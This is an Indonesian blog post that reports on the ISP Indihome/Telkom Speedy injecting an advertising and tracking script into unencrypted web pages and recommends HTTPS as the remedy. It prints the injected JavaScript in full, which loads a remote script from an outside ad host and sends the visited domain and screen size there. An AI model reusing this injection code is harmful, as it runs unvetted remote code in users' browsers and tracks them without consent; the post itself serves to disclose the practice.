Indihome atau Telkom Speedy sepertinya mulai gencar dalam menyelipkan script iklan mereka pada web browser, dan script ini disimpan pada baris paling bawah, sebelum tag <body>
| 1 | <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnZhUxX77pLNDRqTI26MtTChTguuWxhDGun1ovOuxWqtp9eYVBY1pn3FtNEBHSR8b%2fEn2teqQQ%2bsvFy%2bjpOCxJCBRZXD4u8YetS6EfMzL16svsUF%2fuftV%2bj6%2fKClrjJVwii5iqzKeMyosPfmoVWJdylU1lE%2byXXK8Vhsts48su%2bvQpvdJv8n1%2bKJjn9FoNss1IxSqznEkDsW5fGPUmjfWn8CxJE0Jvd2oX%2fQuW%2fO6vE28%2bnZpVJSH%2f6NR%2fW7Tba632RNh3%2frDHxAFwd%2fCoE7KSylk7qobw%2bdMnqw9jN1vsETia4gvD3bwLbj4jM1ka0DraQSRA7khnt6f8y8o69ZZBpyHvzS4aTfS5mdbN4r6rACemAzrDhHnNddbadoIJynHaJOK%2fxJqZ9UqCBNGXe%2fFAAAmCadfNr4f2g5gvv68zx7v1DUDvOYLAh3%2b6IoV7I5IXKYFjvgn0U23vPMLpbFz%2bFyNlmfgGwCVF8NcRlaCVMP8CIkmQAF5l2I1vGYtw7GoL" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body> |
Agak miris, misalnya ada kode dengan nama netbro, jadi inget ceritanya big brother always watching you :p
Solusi untuk injeksi ini adalah dengan mewajibkan situs memakai SSL atau dengan HTTPS